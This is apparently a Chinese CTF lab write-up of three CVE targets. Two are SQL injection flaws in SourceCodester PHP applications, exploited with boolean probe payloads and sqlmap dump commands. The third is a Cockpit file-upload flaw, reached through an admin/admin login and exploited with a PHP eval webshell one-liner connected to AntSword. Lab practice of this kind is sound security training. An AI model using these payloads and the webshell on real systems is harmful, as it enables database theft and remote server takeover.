shuashuashua

CVE-2023-2130

靶标介绍:

在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

通过标靶介绍可以知道在/admin/suppliers/view_details.php页面存在参数id有sql注入漏洞,访问该页面

当参数id=1' and 1=1 --+时正确,id=1' and 1=2 --+时错误,说明存在sql注入漏洞。

抓包,把请求信息保存到5.txt文件中,sqlmap梭哈

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D purchase_order_db --tables

sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag --columns

sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag -C flag --dump

得到flag

CVE-2023-1313

靶标介绍:

cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装

一个登录界面,他的提升通过/install来运行安装,访问/install,但是重定向到了原登录界面,dirsearch进行目录扫描,

可以看到存在该目录,但是不能够访问,尝试弱口令登录

admin / admin

成功登录进去,

找上传页面

上传一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

上传成功后下载,浏览后得到上传目录

访问该路径

可以看到配置文件界面,说明上传成功,连接蚁剑

CVE-2023-0562

靶标介绍:

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

存在mysqli扩展,有数据库,可能存在sql注入,寻找注入点

在这个地方搜索会进行POST传参,然后重定向到该页面

抓包测试

把抓包的内容放到5.txt文件中

searchinput=* *会默认把该参数作为注入点

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D blmsdb --tables

sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag --columns

sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag -C flag --dump

相关推荐
lsec1 小时前
签名不等于可信:详解PE数字签名校验的漏洞与主动规避方案
安全
apcipot_rain10 小时前
【数据库原理及安全实验】实验二 数据库的语句操作
数据库·安全·oracle
Factor安全11 小时前
CVE-2025-24813 漏洞全解析|Apache Tomcat 关键路径绕过与RCE
安全·web安全·网络安全·tomcat·apache·安全威胁分析·安全性测试
心思这就是12 小时前
网络安全L2TP实验
网络·安全·web安全
EasyGBS14 小时前
国标GB28181协议EasyCVR视频融合平台:5G时代远程监控赋能通信基站安全管理
大数据·网络·人工智能·安全·音视频
QT.qtqtqtqtqt15 小时前
网络安全防护技术
安全·网络安全·防火墙·vpn·入侵检测·网闸
EasyGBS17 小时前
视频设备轨迹回放平台EasyCVR远程监控体系落地筑牢国土监管防线
大数据·网络·人工智能·安全
@PHARAOH17 小时前
WHAT - React 安全地订阅外部状态源 - useSyncExternalStore
javascript·安全·react.js
qq_4170146018 小时前
常用的网络安全靶场、工具箱
安全·web安全
李詹19 小时前
海外高防服务器延迟优化——跨国业务安全加速的底层逻辑
网络·安全·网络安全·负载均衡·网络攻击模型·ddos